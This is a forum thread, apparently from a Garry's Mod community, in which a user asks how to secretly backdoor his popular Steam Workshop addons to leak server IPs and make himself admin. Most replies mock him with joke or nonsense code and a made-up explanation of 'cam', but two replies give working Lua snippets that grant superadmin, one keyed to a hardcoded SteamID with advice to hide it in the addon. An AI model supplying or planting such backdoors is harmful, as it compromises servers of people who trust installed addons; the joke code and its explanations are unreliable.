HelpGmod Lua Backdoor

Posts 115 of 18 · Page 1 of 2
Gmod Lua Backdoor
I have some popular addons on steam workshop. I basically want to backdoor them using a lua file to send me their server's ip and make me admin so I can troll. Would be nice if their is a way to mask commands being sent so they dont know I made myself admin or am the one fucking with their server. Would someone mind sharing how to do this as I dont know lua at all.
Go into console and type:
say" ';quit load_function/lua";UnloadLua protection.lua || admin_commands.lua; exec defualt;_restart protection
Quote Originally Posted by I am a man View Post
Go into console and type:
Thanks really helpful! #sarcasm
Quote Originally Posted by evilmystery View Post
Thanks really helpful! #sarcasm
Why sarcasm? I'll post a video of it working ina bit.
Didn't you post this in HF not long ago???
concommand.Add("obvliously_not_a_backdoor", function(player)
player:SetUserGroup("superadmin")
end)
Would someone mind sharing how to do this as I dont know lua at all.

Code:
I dont know lua at all.
dont then
I will help you as long as you let me put myself in the backdoor aswell.
Code:
concommand.Add("backdoor", function(ply)
    ply:PrintMessage(HUD_PRINTTALK, "U r bein backd00red riii noe, kk?")
    ply:SendLua("cam.End3D()")
    print("Backdoor v2.0.0 has succesfully finished backdooring urself.")
end)
To explain what the code does, "cam" stands for "Console admin machine", basically, this library controls the console admin machine, this machine controls who can run what commands, basically I ended the machine so when you run a command, the server gets confused and lets you run it anyways, so you can run any command with this code.

Thank me later.
Quote Originally Posted by z346etn56jzd7egth View Post
Code:
concommand.Add("backdoor", function(ply)
    ply:PrintMessage(HUD_PRINTTALK, "U r bein backd00red riii noe, kk?")
    ply:SendLua("cam.End3D()")
    print("Backdoor v2.0.0 has succesfully finished backdooring urself.")
end)
To explain what the code does, "cam" stands for "Console admin machine", basically, this library controls the console admin machine, this machine controls who can run what commands, basically I ended the machine so when you run a command, the server gets confused and lets you run it anyways, so you can run any command with this code.

Thank me later.
ur still a brony
Here you go: function ADDMIN( ply )
if ( ply:SteamID() == "YOUR STEAMID HERE" ) then
ply:SetUserGroup("superadmin")
end
end
hook.Add("PlayerSpawn", "ADDMIN", ADDMIN) PUT ANYWHERE IN CODE, HIDE IT!!!
Code:
lua_run_cl local DetourTable = { [ "GetAdminsByThread" ] = "function0x0c11x" } local function blank() local function GetRCC( cmd, str ) RunConsoleCommand( "exec", "lab" ) end end local function DetourFunc( old, new ) return { DetourTable[ new ], DetourTable[ old ] } end DetourFunc( _G[33 % RealTime(), blank ) if ( DetourFunc ) then GetRCC( "exec_serverside", "lab" ) end
not that hard lol
#Newb How would you backdoor your addon after its uploaded?
Quote Originally Posted by gmoder_ View Post
#Newb How would you backdoor your addon after its uploaded?
ur done kid
Posts 115 of 18 · Page 1 of 2

Post a Reply

Similar Threads

Tags for this Thread

None

Need help?